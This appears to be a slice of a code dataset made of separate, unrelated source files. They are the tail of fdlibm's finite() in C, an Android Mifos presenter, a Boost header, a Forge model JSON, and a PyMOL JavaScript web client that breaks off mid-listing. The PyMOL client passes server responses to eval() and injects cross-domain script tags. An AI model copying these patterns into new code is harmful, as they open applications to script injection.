See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\n/*\n * finite(x) returns 1 is x is finite, else 0;\n * no branching!\n */\n\n#include \"fdlibm.h\"\n\n#ifdef __STDC__\n int finite(double x)\n#else\n int finite(x)\n double x;\n#endif\n{\n int hx;\n hx = __HI(x);\n return (unsigned)((hx&0x7fffffff)-0x7ff00000)>>31;\n}\n"} {"text": "package com.mifos.mifosxdroid.dialogfragments.identifierdialog;\n\n\nimport com.mifos.api.datamanager.DataManagerClient;\nimport com.mifos.mifosxdroid.R;\nimport com.mifos.mifosxdroid.base.BasePresenter;\nimport com.mifos.objects.noncore.DocumentType;\nimport com.mifos.objects.noncore.IdentifierCreationResponse;\nimport com.mifos.objects.noncore.IdentifierPayload;\nimport com.mifos.objects.noncore.IdentifierTemplate;\nimport com.mifos.utils.MFErrorParser;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\n\nimport javax.inject.Inject;\n\nimport retrofit2.adapter.rxjava.HttpException;\nimport rx.Observable;\nimport rx.Subscriber;\nimport rx.android.schedulers.AndroidSchedulers;\nimport rx.functions.Action1;\nimport rx.plugins.RxJavaPlugins;\nimport rx.schedulers.Schedulers;\nimport rx.subscriptions.CompositeSubscription;\n\n/**\n * Created by Rajan Maurya on 01/10/16.\n */\n\npublic class IdentifierDialogPresenter extends BasePresenter {\n\n private final DataManagerClient mDataManagerClient;\n private CompositeSubscription mSubscriptions;\n\n @Inject\n public IdentifierDialogPresenter(DataManagerClient dataManagerClient) {\n mDataManagerClient = dataManagerClient;\n mSubscriptions = new CompositeSubscription();\n }\n\n @Override\n public void attachView(IdentifierDialogMvpView mvpView) {\n super.attachView(mvpView);\n }\n\n @Override\n public void detachView() {\n super.detachView();\n mSubscriptions.clear();\n }\n\n public void loadClientIdentifierTemplate(int clientId) {\n checkViewAttached();\n getMvpView().showProgressbar(true);\n mSubscriptions.add(mDataManagerClient.getClientIdentifierTemplate(clientId)\n .observeOn(AndroidSchedulers.mainThread())\n .subscribeOn(Schedulers.io())\n .subscribe(new Subscriber() {\n @Override\n public void onCompleted() {\n }\n\n @Override\n public void onError(Throwable e) {\n getMvpView().showProgressbar(false);\n getMvpView().showError(R.string.failed_to_fetch_identifier_template);\n }\n\n @Override\n public void onNext(IdentifierTemplate identifierTemplate) {\n getMvpView().showProgressbar(false);\n getMvpView().showClientIdentifierTemplate(identifierTemplate);\n }\n })\n );\n }\n\n public void createClientIdentifier(int clientId, IdentifierPayload identifierPayload) {\n checkViewAttached();\n getMvpView().showProgressbar(true);\n mSubscriptions.add(mDataManagerClient.createClientIdentifier(clientId, identifierPayload)\n .observeOn(AndroidSchedulers.mainThread())\n .subscribeOn(Schedulers.io())\n .subscribe(new Subscriber() {\n @Override\n public void onCompleted() {\n }\n\n @Override\n public void onError(Throwable e) {\n getMvpView().showProgressbar(false);\n try {\n if (e instanceof HttpException) {\n String 
errorMessage = ((HttpException) e).response().errorBody()\n .string();\n getMvpView().showErrorMessage(MFErrorParser.parseError(errorMessage)\n .getErrors().get(0).getDefaultUserMessage());\n }\n } catch (Throwable throwable) {\n RxJavaPlugins.getInstance().getErrorHandler().handleError(e);\n }\n }\n\n @Override\n public void onNext(IdentifierCreationResponse identifierCreationResponse) {\n getMvpView().showProgressbar(false);\n getMvpView().showIdentifierCreatedSuccessfully(identifierCreationResponse);\n }\n })\n );\n }\n\n public List getIdentifierDocumentTypeNames(List documentTypes) {\n final ArrayList documentTypeList = new ArrayList<>();\n Observable.from(documentTypes)\n .subscribe(new Action1() {\n @Override\n public void call(DocumentType documentType) {\n documentTypeList.add(documentType.getName());\n }\n });\n return documentTypeList;\n }\n\n /**\n * Method to map Document Type with the corresponding name.\n * @param documentTypeList List of DocumentType\n * @return HashMap of \n */\n HashMap mapDocumentTypesWithName(List documentTypeList) {\n final HashMap hashMap = new HashMap<>();\n Observable.from(documentTypeList)\n .subscribe(new Action1() {\n @Override\n public void call(DocumentType documentType) {\n hashMap.put(documentType.getName(), documentType);\n }\n });\n return hashMap;\n }\n}\n"} {"text": "\n#ifndef BOOST_MPL_AUX_CONFIG_USE_PREPROCESSED_HPP_INCLUDED\n#define BOOST_MPL_AUX_CONFIG_USE_PREPROCESSED_HPP_INCLUDED\n\n// Copyright Aleksey Gurtovoy 2000-2004\n//\n// Distributed under the Boost Software License, Version 1.0. \n// (See accompanying file LICENSE_1_0.txt or copy at \n// http://www.boost.org/LICENSE_1_0.txt)\n//\n// See http://www.boost.org/libs/mpl for documentation.\n\n// $Id$\n// $Date$\n// $Revision$\n\n// #define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS\n\n#endif // BOOST_MPL_AUX_CONFIG_USE_PREPROCESSED_HPP_INCLUDED\n"} {"text": "{\n \"forge_marker\": 1,\n \"defaults\": {\n \"model\": \"builtin/generated\",\n \"transform\": \"forge:default-item\"\n },\n \"variants\": {\n \"variant\": {\n \"vehicle_upgrade_speed\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_speed\"\n }\n },\n \"vehicle_upgrade_aim\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_aim\"\n }\n },\n \"vehicle_upgrade_reload\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_reload\"\n }\n },\n \"vehicle_upgrade_power\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_power\"\n }\n },\n \"vehicle_upgrade_turret_pitch\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_turret_pitch\"\n }\n },\n \"vehicle_upgrade_pitch_up\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_pitch_up\"\n }\n },\n \"vehicle_upgrade_pitch_down\": {\n \"textures\": {\n \"layer0\": \"ancientwarfare:items/vehicle/upgrade/upgrade_pitch_down\"\n }\n }\n }\n }\n}\n"} {"text": "// Copyright (C) Schrodinger, LLC, New York, NY.\n// All rights reserved. 
\n\nvar pymol_fn_counter = 0;\n\nfunction PyMOL(host, port, bufferMode, prefix) {\n\n this.Path = \"/apply?_json=\"; // URL path to pass json args to pymol\n\n // now using _underscore_names for internal attributes & methods\n\n this._cmd_buffer = [];\n\n // do we throw up visible alerts when exceptions occur?\n\n this._alerts = true;\n\n this._host = host;\n this._port = port;\n\n this._parseBufferMode = function (bufferMode) {\n if ((bufferMode != undefined) && (bufferMode == 'on')) {\n return 'on';\n } else {\n return 'off';\n }\n }\n this._bufferMode = this._parseBufferMode(bufferMode);\n\n if(prefix == undefined) {\n this._prefix = 'pymol'; // default remote object name\n } else {\n this._prefix = prefix;\n }\n\n try {\n xmlhttp = new XMLHttpRequest();\n } catch(e) {\n xmlhttp = new ActiveXObject(\"Microsoft.XMLHTTP\");\n }\n\n this.setBufferMode = function(bufferMode) {\n this._bufferMode = this._parseBufferMode(bufferMode);\n if (this._bufferMode == 'off') {\n this.flush();\n }\n }\n\n this.flush = function(callback) {\n if (this._cmd_buffer.length > 0) {\n var result = this._json('[' + this._cmd_buffer.join(',') + ']', callback);\n this._cmd_buffer.length = 0;\n return result;\n }\n }\n this.getBufferJSON = function() {\n return ('[' + this._cmd_buffer.join(',') + ']');\n }\n this.getBufferURL = function() {\n return (this.Path + '[' + this._cmd_buffer.join(',') + ']');\n }\n\n this._send_ajax = function(pypath, callback) {\n if (host == null) {\n myurl = pypath;\n } else {\n myurl = \"http://\" + host + \":\" + port + pypath;\n }\n if(myurl.length>2000) { /* some broswers can't handle long URLs */\n var part = myurl.split(\"?\",2);\n short_url = part[0];\n long_param = part[1];\n if (callback) {\n xmlhttp.open(\"POST\", short_url, true);\n xmlhttp.onreadystatechange = callback;\n } else {\n xmlhttp.open(\"POST\", short_url, false);\n }\n xmlhttp.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");\n xmlhttp.setRequestHeader(\"Content-length\", long_param.length);\n xmlhttp.setRequestHeader('Accept', 'text/json');\n xmlhttp.send(long_param);\n } else {\n if (callback) {\n xmlhttp.open(\"GET\", myurl, true);\n xmlhttp.onreadystatechange = callback;\n } else {\n xmlhttp.open(\"GET\", myurl, false);\n }\n xmlhttp.setRequestHeader('Accept', 'text/json');\n xmlhttp.send(null);\n }\n if (callback) {\n } else {\n if (xmlhttp.status == 500) {\n alert(\"PyMOL Exception:\\n\" + eval('(' + xmlhttp.responseText + ')').join(\"\\n\"));\n return null;\n } \n return eval('(' + xmlhttp.responseText + ')');\n }\n return false;\n }\n \n this._send_cross_script = function(pypath, callback) {\n if (host == null) {\n myurl = pypath;\n } else {\n myurl = \"http://\" + host + \":\" + port + pypath;\n }\n if (callback == undefined) {\n //myurl += \"&_callback=alert\"\n myurl += \"&_callback=void\"\n } else {\n // IE does not have callback.name, so we invent a unique one\n // and store it in the \"global\" namespace, window. 
In this way,\n // the javascript callback from our cross-domain script hack\n // contains a javascript function name known to this page/window.\n if (callback.name == undefined) {\n callback.name = '_fn' + pymol_fn_counter++;\n window[ callback.name ] = callback;\n } \n myurl += \"&_callback=\" + callback.name;\n }\n var head = document.getElementsByTagName(\"head\")[0];\n var script = document.createElement(\"script\");\n script.src = myurl;\n head.appendChild(script);\n return true;\n }\n\n this._send = function(pypath, callback) {\n if ( (host == null) || \n ((host == document.domain) && (port == document.location.port)) ) {\n return this._send_ajax(pypath, callback);\n } else {\n return this._send_cross_script(pypath, callback);\n }\n }\n \n this._handle_response = function(status, text) {\n response = JSON.parse(text);\n if(status == 200) { // normal result\n return response;\n } else { // some kind of error condition\n if(this._alerts) {\n alert(response.join(\"\\n\"));\n }\n return;\n }\n }\n\n this._result = function(e) {\n if ((host == document.domain) || (host == null)) {\n if (typeof e == \"object\") {\n // asynchronous ajax was used\n if (xmlhttp.readyState == 4) {\n return this._handle_response(xmlhttp.status, xmlhttp.responseText);\n return;\n }\n }\n // \"synchronous\" (no-callback) ajax was used\n if(xmlhttp.responseText) {\n return this._handle_response(xmlhttp.status, xmlhttp.responseText);\n } else {\n return;\n }\n } \n // e was provided by cross-script callback, so just return it\n return e;\n }\n\n // for private use\n this._json = function(jcmd,callback) {\n return this._send(this.Path+jcmd,callback);\n }\n // for public use; args switched to match style of pymol.cmd calls\n this.sendJSON = function(anyargs) {\n if (typeof arguments[0] == 'function') {\n //this.sendJSON = function(callback, jcmd) {\n callback = arguments[0];\n jcmd = arguments[1];\n } else {\n //this.sendJSON = function(jcmd) {\n callback = null;\n jcmd = arguments[0];\n }\n return this._send(this.Path+jcmd,callback);\n }\n\n this._apply = function(name, args, kwds, callback) {\n // note: javascript's 'this' can refer to either pymol or cmd\n if (name.substring(0,1) == '.') { // .cmd.method -> pymol.cmd.method\n name = this._prefix + name;\n }\n var mypath = this.Path;\n var myargs = '[\"' + name + '\"';\n if (args != null) {\n myargs = myargs + \",\" + JSON.stringify(args);\n if(kwds != null) {\n myargs = myargs + \",\" + JSON.stringify(kwds);\n }\n } else if(kwds != null) {\n myargs = myargs + \",[],\" + JSON.stringify(kwds)\n }\n myargs = myargs + \"]\";\n\n // document.getElementById('debug').innerHTML = mypath;\n\n if (this._bufferMode == 'on') {\n this._cmd_buffer.push(myargs);\n if ( callback ) {\n this.flush(callback);\n } else {\n return;\n }\n } else {\n return this._send(mypath+myargs,callback);\n }\n }\n\n this.apply_cmd = function(name, args, kwds, callback) {\n this._apply(\".cmd.\" + name, args, kwds, callback);\n }\n\n this.cmd = { // cmd is a public attribute of PyMOL instances\n \n _dispatch: function(anyargs) {\n // name is always first argument\n var name = \".cmd.\" + arguments[0];\n // callback function is optional second argument\n var callback = undefined;\n var argstart = 1;\n if (typeof arguments[1] == 'function') {\n callback = arguments[1];\n argstart = 2;\n }\n return this._outer._apply(name,Array.prototype.slice.apply(arguments).slice(argstart),null,callback);\n },\n\n // BEGIN MACHINE-GENERATED CODE\n // python webapi.py\n\n load: function() {\n return 
this._dispatch.apply(this,\n [\"load\"].concat(Array.prototype.slice.apply(arguments)));\n },\n load_traj: function() {\n return this._dispatch.apply(this,\n [\"load_traj\"].concat(Array.prototype.slice.apply(arguments)));\n },\n load_png: function() {\n return this._dispatch.apply(this,\n [\"load_png\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fragment: function() {\n return this._dispatch.apply(this,\n [\"fragment\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fetch: function() {\n return this._dispatch.apply(this,\n [\"fetch\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_mmodstr: function() {\n return this._dispatch.apply(this,\n [\"read_mmodstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_molstr: function() {\n return this._dispatch.apply(this,\n [\"read_molstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_sdfstr: function() {\n return this._dispatch.apply(this,\n [\"read_sdfstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_pdbstr: function() {\n return this._dispatch.apply(this,\n [\"read_pdbstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n read_xplorstr: function() {\n return this._dispatch.apply(this,\n [\"read_xplorstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_pdbstr: function() {\n return this._dispatch.apply(this,\n [\"get_pdbstr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_fastastr: function() {\n return this._dispatch.apply(this,\n [\"get_fastastr\"].concat(Array.prototype.slice.apply(arguments)));\n },\n copy: function() {\n return this._dispatch.apply(this,\n [\"copy\"].concat(Array.prototype.slice.apply(arguments)));\n },\n create: function() {\n return this._dispatch.apply(this,\n [\"create\"].concat(Array.prototype.slice.apply(arguments)));\n },\n extract: function() {\n return this._dispatch.apply(this,\n [\"extract\"].concat(Array.prototype.slice.apply(arguments)));\n },\n split_states: function() {\n return this._dispatch.apply(this,\n [\"split_states\"].concat(Array.prototype.slice.apply(arguments)));\n },\n symexp: function() {\n return this._dispatch.apply(this,\n [\"symexp\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ramp_new: function() {\n return this._dispatch.apply(this,\n [\"ramp_new\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_name: function() {\n return this._dispatch.apply(this,\n [\"set_name\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_new: function() {\n return this._dispatch.apply(this,\n [\"map_new\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_set: function() {\n return this._dispatch.apply(this,\n [\"map_set\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_set_border: function() {\n return this._dispatch.apply(this,\n [\"map_set_border\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_double: function() {\n return this._dispatch.apply(this,\n [\"map_double\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_halve: function() {\n return this._dispatch.apply(this,\n [\"map_halve\"].concat(Array.prototype.slice.apply(arguments)));\n },\n map_trim: function() {\n return this._dispatch.apply(this,\n [\"map_trim\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isodot: function() {\n return this._dispatch.apply(this,\n [\"isodot\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isolevel: function() {\n return this._dispatch.apply(this,\n 
[\"isolevel\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isomesh: function() {\n return this._dispatch.apply(this,\n [\"isomesh\"].concat(Array.prototype.slice.apply(arguments)));\n },\n isosurface: function() {\n return this._dispatch.apply(this,\n [\"isosurface\"].concat(Array.prototype.slice.apply(arguments)));\n },\n slice_new: function() {\n return this._dispatch.apply(this,\n [\"slice_new\"].concat(Array.prototype.slice.apply(arguments)));\n },\n gradient: function() {\n return this._dispatch.apply(this,\n [\"gradient\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ungroup: function() {\n return this._dispatch.apply(this,\n [\"ungroup\"].concat(Array.prototype.slice.apply(arguments)));\n },\n group: function() {\n return this._dispatch.apply(this,\n [\"group\"].concat(Array.prototype.slice.apply(arguments)));\n },\n pseudoatom: function() {\n return this._dispatch.apply(this,\n [\"pseudoatom\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fab: function() {\n return this._dispatch.apply(this,\n [\"fab\"].concat(Array.prototype.slice.apply(arguments)));\n },\n enable: function() {\n return this._dispatch.apply(this,\n [\"enable\"].concat(Array.prototype.slice.apply(arguments)));\n },\n disable: function() {\n return this._dispatch.apply(this,\n [\"disable\"].concat(Array.prototype.slice.apply(arguments)));\n },\n delete_: function() {\n return this._dispatch.apply(this,\n [\"delete_\"].concat(Array.prototype.slice.apply(arguments)));\n },\n reinitialize: function() {\n return this._dispatch.apply(this,\n [\"reinitialize\"].concat(Array.prototype.slice.apply(arguments)));\n },\n deselect: function() {\n return this._dispatch.apply(this,\n [\"deselect\"].concat(Array.prototype.slice.apply(arguments)));\n },\n select: function() {\n return this._dispatch.apply(this,\n [\"select\"].concat(Array.prototype.slice.apply(arguments)));\n },\n indicate: function() {\n return this._dispatch.apply(this,\n [\"indicate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n select_list: function() {\n return this._dispatch.apply(this,\n [\"select_list\"].concat(Array.prototype.slice.apply(arguments)));\n },\n pop: function() {\n return this._dispatch.apply(this,\n [\"pop\"].concat(Array.prototype.slice.apply(arguments)));\n },\n angle: function() {\n return this._dispatch.apply(this,\n [\"angle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n dihedral: function() {\n return this._dispatch.apply(this,\n [\"dihedral\"].concat(Array.prototype.slice.apply(arguments)));\n },\n dist: function() {\n return this._dispatch.apply(this,\n [\"dist\"].concat(Array.prototype.slice.apply(arguments)));\n },\n distance: function() {\n return this._dispatch.apply(this,\n [\"distance\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_angle: function() {\n return this._dispatch.apply(this,\n [\"get_angle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_dihedral: function() {\n return this._dispatch.apply(this,\n [\"get_dihedral\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_distance: function() {\n return this._dispatch.apply(this,\n [\"get_distance\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_area: function() {\n return this._dispatch.apply(this,\n [\"get_area\"].concat(Array.prototype.slice.apply(arguments)));\n },\n color: function() {\n return this._dispatch.apply(this,\n [\"color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n bg_color: function() {\n return this._dispatch.apply(this,\n 
[\"bg_color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rebuild: function() {\n return this._dispatch.apply(this,\n [\"rebuild\"].concat(Array.prototype.slice.apply(arguments)));\n },\n refresh: function() {\n return this._dispatch.apply(this,\n [\"refresh\"].concat(Array.prototype.slice.apply(arguments)));\n },\n recolor: function() {\n return this._dispatch.apply(this,\n [\"recolor\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_color: function() {\n return this._dispatch.apply(this,\n [\"set_color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_object_color: function() {\n return this._dispatch.apply(this,\n [\"set_object_color\"].concat(Array.prototype.slice.apply(arguments)));\n },\n show: function() {\n return this._dispatch.apply(this,\n [\"show\"].concat(Array.prototype.slice.apply(arguments)));\n },\n show_as: function() {\n return this._dispatch.apply(this,\n [\"show_as\"].concat(Array.prototype.slice.apply(arguments)));\n },\n hide: function() {\n return this._dispatch.apply(this,\n [\"hide\"].concat(Array.prototype.slice.apply(arguments)));\n },\n cartoon: function() {\n return this._dispatch.apply(this,\n [\"cartoon\"].concat(Array.prototype.slice.apply(arguments)));\n },\n spectrum: function() {\n return this._dispatch.apply(this,\n [\"spectrum\"].concat(Array.prototype.slice.apply(arguments)));\n },\n center: function() {\n return this._dispatch.apply(this,\n [\"center\"].concat(Array.prototype.slice.apply(arguments)));\n },\n zoom: function() {\n return this._dispatch.apply(this,\n [\"zoom\"].concat(Array.prototype.slice.apply(arguments)));\n },\n reset: function() {\n return this._dispatch.apply(this,\n [\"reset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n clip: function() {\n return this._dispatch.apply(this,\n [\"clip\"].concat(Array.prototype.slice.apply(arguments)));\n },\n orient: function() {\n return this._dispatch.apply(this,\n [\"orient\"].concat(Array.prototype.slice.apply(arguments)));\n },\n origin: function() {\n return this._dispatch.apply(this,\n [\"origin\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_view: function() {\n return this._dispatch.apply(this,\n [\"set_view\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_view: function() {\n return this._dispatch.apply(this,\n [\"get_view\"].concat(Array.prototype.slice.apply(arguments)));\n },\n move: function() {\n return this._dispatch.apply(this,\n [\"move\"].concat(Array.prototype.slice.apply(arguments)));\n },\n turn: function() {\n return this._dispatch.apply(this,\n [\"turn\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rock: function() {\n return this._dispatch.apply(this,\n [\"rock\"].concat(Array.prototype.slice.apply(arguments)));\n },\n stereo: function() {\n return this._dispatch.apply(this,\n [\"stereo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get: function() {\n return this._dispatch.apply(this,\n [\"get\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set: function() {\n return this._dispatch.apply(this,\n [\"set\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_bond: function() {\n return this._dispatch.apply(this,\n [\"set_bond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unset: function() {\n return this._dispatch.apply(this,\n [\"unset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unset_bond: function() {\n return this._dispatch.apply(this,\n [\"unset_bond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n 
get_setting_boolean: function() {\n return this._dispatch.apply(this,\n [\"get_setting_boolean\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_int: function() {\n return this._dispatch.apply(this,\n [\"get_setting_int\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_float: function() {\n return this._dispatch.apply(this,\n [\"get_setting_float\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_legacy: function() {\n return this._dispatch.apply(this,\n [\"get_setting_legacy\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_tuple: function() {\n return this._dispatch.apply(this,\n [\"get_setting_tuple\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_setting_text: function() {\n return this._dispatch.apply(this,\n [\"get_setting_text\"].concat(Array.prototype.slice.apply(arguments)));\n },\n window: function() {\n return this._dispatch.apply(this,\n [\"window\"].concat(Array.prototype.slice.apply(arguments)));\n },\n viewport: function() {\n return this._dispatch.apply(this,\n [\"viewport\"].concat(Array.prototype.slice.apply(arguments)));\n },\n full_screen: function() {\n return this._dispatch.apply(this,\n [\"full_screen\"].concat(Array.prototype.slice.apply(arguments)));\n },\n quit: function() {\n return this._dispatch.apply(this,\n [\"quit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n draw: function() {\n return this._dispatch.apply(this,\n [\"draw\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ray: function() {\n return this._dispatch.apply(this,\n [\"ray\"].concat(Array.prototype.slice.apply(arguments)));\n },\n align: function() {\n return this._dispatch.apply(this,\n [\"align\"].concat(Array.prototype.slice.apply(arguments)));\n },\n super_: function() {\n return this._dispatch.apply(this,\n [\"super_\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fit: function() {\n return this._dispatch.apply(this,\n [\"fit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rms: function() {\n return this._dispatch.apply(this,\n [\"rms\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rms_cur: function() {\n return this._dispatch.apply(this,\n [\"rms_cur\"].concat(Array.prototype.slice.apply(arguments)));\n },\n intra_fit: function() {\n return this._dispatch.apply(this,\n [\"intra_fit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n intra_rms: function() {\n return this._dispatch.apply(this,\n [\"intra_rms\"].concat(Array.prototype.slice.apply(arguments)));\n },\n intra_rms_cur: function() {\n return this._dispatch.apply(this,\n [\"intra_rms_cur\"].concat(Array.prototype.slice.apply(arguments)));\n },\n pair_fit: function() {\n return this._dispatch.apply(this,\n [\"pair_fit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n space: function() {\n return this._dispatch.apply(this,\n [\"space\"].concat(Array.prototype.slice.apply(arguments)));\n },\n order: function() {\n return this._dispatch.apply(this,\n [\"order\"].concat(Array.prototype.slice.apply(arguments)));\n },\n edit_mode: function() {\n return this._dispatch.apply(this,\n [\"edit_mode\"].concat(Array.prototype.slice.apply(arguments)));\n },\n button: function() {\n return this._dispatch.apply(this,\n [\"button\"].concat(Array.prototype.slice.apply(arguments)));\n },\n config_mouse: function() {\n return this._dispatch.apply(this,\n [\"config_mouse\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mouse: function() {\n return this._dispatch.apply(this,\n 
[\"mouse\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mask: function() {\n return this._dispatch.apply(this,\n [\"mask\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unmask: function() {\n return this._dispatch.apply(this,\n [\"unmask\"].concat(Array.prototype.slice.apply(arguments)));\n },\n count_atoms: function() {\n return this._dispatch.apply(this,\n [\"count_atoms\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_chains: function() {\n return this._dispatch.apply(this,\n [\"get_chains\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_color_index: function() {\n return this._dispatch.apply(this,\n [\"get_color_index\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_color_indices: function() {\n return this._dispatch.apply(this,\n [\"get_color_indices\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_object_color_index: function() {\n return this._dispatch.apply(this,\n [\"get_object_color_index\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_object_list: function() {\n return this._dispatch.apply(this,\n [\"get_object_list\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_color_tuple: function() {\n return this._dispatch.apply(this,\n [\"get_color_tuple\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_atom_coords: function() {\n return this._dispatch.apply(this,\n [\"get_atom_coords\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_extent: function() {\n return this._dispatch.apply(this,\n [\"get_extent\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_names: function() {\n return this._dispatch.apply(this,\n [\"get_names\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_names_of_type: function() {\n return this._dispatch.apply(this,\n [\"get_names_of_type\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_legal_name: function() {\n return this._dispatch.apply(this,\n [\"get_legal_name\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_unused_name: function() {\n return this._dispatch.apply(this,\n [\"get_unused_name\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_object_matrix: function() {\n return this._dispatch.apply(this,\n [\"get_object_matrix\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_phipsi: function() {\n return this._dispatch.apply(this,\n [\"get_phipsi\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_position: function() {\n return this._dispatch.apply(this,\n [\"get_position\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_raw_alignment: function() {\n return this._dispatch.apply(this,\n [\"get_raw_alignment\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_renderer: function() {\n return this._dispatch.apply(this,\n [\"get_renderer\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_symmetry: function() {\n return this._dispatch.apply(this,\n [\"get_symmetry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_title: function() {\n return this._dispatch.apply(this,\n [\"get_title\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_type: function() {\n return this._dispatch.apply(this,\n [\"get_type\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_version: function() {\n return this._dispatch.apply(this,\n [\"get_version\"].concat(Array.prototype.slice.apply(arguments)));\n },\n id_atom: function() {\n return this._dispatch.apply(this,\n 
[\"id_atom\"].concat(Array.prototype.slice.apply(arguments)));\n },\n identify: function() {\n return this._dispatch.apply(this,\n [\"identify\"].concat(Array.prototype.slice.apply(arguments)));\n },\n index: function() {\n return this._dispatch.apply(this,\n [\"index\"].concat(Array.prototype.slice.apply(arguments)));\n },\n phi_psi: function() {\n return this._dispatch.apply(this,\n [\"phi_psi\"].concat(Array.prototype.slice.apply(arguments)));\n },\n matrix_copy: function() {\n return this._dispatch.apply(this,\n [\"matrix_copy\"].concat(Array.prototype.slice.apply(arguments)));\n },\n matrix_reset: function() {\n return this._dispatch.apply(this,\n [\"matrix_reset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rotate: function() {\n return this._dispatch.apply(this,\n [\"rotate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n translate: function() {\n return this._dispatch.apply(this,\n [\"translate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_object_ttt: function() {\n return this._dispatch.apply(this,\n [\"set_object_ttt\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_dihedral: function() {\n return this._dispatch.apply(this,\n [\"set_dihedral\"].concat(Array.prototype.slice.apply(arguments)));\n },\n transform_object: function() {\n return this._dispatch.apply(this,\n [\"transform_object\"].concat(Array.prototype.slice.apply(arguments)));\n },\n transform_selection: function() {\n return this._dispatch.apply(this,\n [\"transform_selection\"].concat(Array.prototype.slice.apply(arguments)));\n },\n translate_atom: function() {\n return this._dispatch.apply(this,\n [\"translate_atom\"].concat(Array.prototype.slice.apply(arguments)));\n 